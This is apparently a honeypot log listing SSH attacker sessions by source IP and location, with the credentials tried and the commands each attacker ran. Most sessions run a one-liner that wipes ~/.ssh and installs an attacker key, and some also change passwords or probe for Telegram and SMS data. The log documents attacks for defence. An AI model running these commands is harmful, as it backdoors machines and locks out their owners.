$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 pretzel_root_7 (164.92.160.160) — Frankfurt am Main, Germany · 1 session · 2 cmds

2026-04-08 10:31 EDT · as oracle/oracle17!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_38 (207.46.224.81) — Singapore, Singapore · 5 sessions · 5 cmds

2026-04-08 02:57 EDT · as root/1234, root/123456, root/12345678

grep → netstat → OS/kernel identification → history snooping

$ grep 'model name' /proc/cpuinfo 2>/dev/null | head -1 | cut -d ':' -f2- | sed 's/^ *//' | xargs || echo unknown ×2

$ netstat -tulpn | head -10

$ uname -a

↳ OS/kernel identification

$ history | tail -5

↳ history snooping

🎭 autobahn_root_13 (94.249.167.63) — Frankfurt am Main, Germany · 2 sessions · 2 cmds

2026-04-08 05:03 EDT · as root/root

OS/kernel identification → ssh

$ uname -a

↳ OS/kernel identification

$ ssh -V

🎭 specter_root_15 (165.154.1.18) — Hong Kong, Hong Kong · 2 sessions · 4 cmds

2026-03-23 00:30 EDT · as oracle/Admin123, oracle/Oracle1@

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 dragon_root_16 (116.177.172.64) — Jinrongjie, China · 3 sessions · 3 cmds

2026-04-07 00:25 EDT · as oracle/Aa123456, oracle/oracle@123, root/12345678

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×3

↳ OS/kernel identification

🎭 wok_root_25 (117.62.235.154) — Nanjing, China · 1 session · 1 cmd

2026-04-08 00:06 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 cipher_root_9 (103.77.215.165) — Hanoi, Vietnam · 19 sessions · 19 cmds

2026-04-07 17:52 EDT · as admin/123456, admin/admin123, mysql/mysql

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×19

🎭 fjord_root_3 (89.160.28.32) — Axvall, Sweden · 1 session · 9 cmds

2026-04-07 23:41 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 wraith_root_41 (186.31.95.163) — Bogotá, Colombia · 1 session · 2 cmds

2026-04-07 23:11 EDT · as oracle/oracle123!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 eagle_root_15 (98.26.115.52) — Raleigh, United States · 1 session · 2 cmds

2026-04-07 22:00 EDT · as oracle/oracle21

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_39 (112.118.57.75) — Central, Hong Kong · 1 session · 9 cmds

2026-04-07 21:11 EDT · as root/root

/root root login → /ip cloud print → ifconfig → uname -a → cat /proc/cpuinfo → ps | grep '[Mm]iner' → ps -ef | grep '[Mm]iner' → ls -la ~/.local/share/TelegramDesktop/tdata /home//.local/share/TelegramDesktop/tdata /dev/ttyGSM → locate D877F7

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 ghost_root_64 (123.58.219.234) — Hong Kong, Hong Kong · 3 sessions · 6 cmds

2026-04-07 19:49 EDT · as oracle/ORACLE, oracle/Oracle28!, oracle/oracle#123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

🎭 batik_root (202.165.29.123) — Kuala Lumpur, Malaysia · 3 sessions · 6 cmds

2026-04-07 19:58 EDT · as oracle/ORACLE, oracle/Oracle28!, oracle/oracle#123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

🎭 blitz_root_11 (64.188.119.33) — Frankfurt am Main, Germany · 3 sessions · 6 cmds

2026-04-07 19:33 EDT · as oracle/ORACLE, oracle/Oracle28!, oracle/oracle#123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

🎭 cipher_root_4 (27.111.32.174) — Jakarta, Indonesia · 4 sessions · 8 cmds

2026-04-03 11:19 EDT · as oracle/ORACLE, oracle/Oracle2026!@#, oracle/Oracle28!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×4

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×4

↳ SSH key persistence

🎭 ghost_root_65 (103.143.238.207) — Mong Kok, Hong Kong · 3 sessions · 6 cmds

2026-04-07 19:35 EDT · as oracle/ORACLE, oracle/Oracle28!, oracle/oracle#123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

🎭 seoul_root_9 (203.228.30.198) — Pohang, South Korea · 3 sessions · 6 cmds

2026-04-07 19:37 EDT · as oracle/ORACLE, oracle/Oracle28!, oracle/oracle#123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

🎭 dragon_db_3 (180.76.170.111) — Beijing, China · 1 session · 20 cmds

2026-04-07 19:45 EDT · as oracle/ORACLE

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "ORACLE\ncEtek57IqpFk\ncEtek57IqpFk"|passwd|bash

$ Enter new UNIX password:

$ echo "ORACLE\ncEtek57IqpFk\ncEtek57IqpFk\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 stroopwafel_root_5 (107.189.27.179) — Zaandam, The Netherlands · 3 sessions · 6 cmds

2026-04-07 19:38 EDT · as oracle/ORACLE, oracle/Oracle28!, oracle/oracle#123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

🎭 wok_root_26 (61.155.106.101) — Yangzhou, China · 1 session · 2 cmds

2026-04-07 19:29 EDT · as oracle/oracle#123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 eagle_root_16 (172.203.134.70) — Boydton, United States · 1 session · 2 cmds

2026-04-07 19:29 EDT · as oracle/oracle#123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_40 (189.206.155.253) — Loma la Paz, Mexico · 1 session · 2 cmds

2026-04-07 19:28 EDT · as oracle/ORACLE

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 kimchi_db (203.247.143.193) — Seoul, South Korea · 1 session · 20 cmds

2026-04-07 19:28 EDT · as oracle/ORACLE

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "ORACLE\nJ1GXpv6krsKU\nJ1GXpv6krsKU"|passwd|bash

$ Enter new UNIX password:

$ echo "ORACLE\nJ1GXpv6krsKU\nJ1GXpv6krsKU\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 capoeira_root_6 (45.164.39.253) — Foz do Iguaçu, Brazil · 1 session · 2 cmds

2026-04-07 16:50 EDT · as oracle/Oracle!@

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 phantom_root_35 (23.91.97.213) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-07 16:41 EDT · as oracle/Oracle!@

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 k-pop_root_4 (211.213.96.171) — Busan, South Korea · 1 session · 2 cmds

2026-04-07 16:40 EDT · as oracle/oracle20

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_25 (165.154.6.166) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-07 16:29 EDT · as oracle/Oracle!@

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 tea_root_7 (85.234.135.186) — Reading, United Kingdom · 2 sessions · 4 cmds

2026-04-07 15:17 EDT · as oracle/oracle11!, oracle/oracle17

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

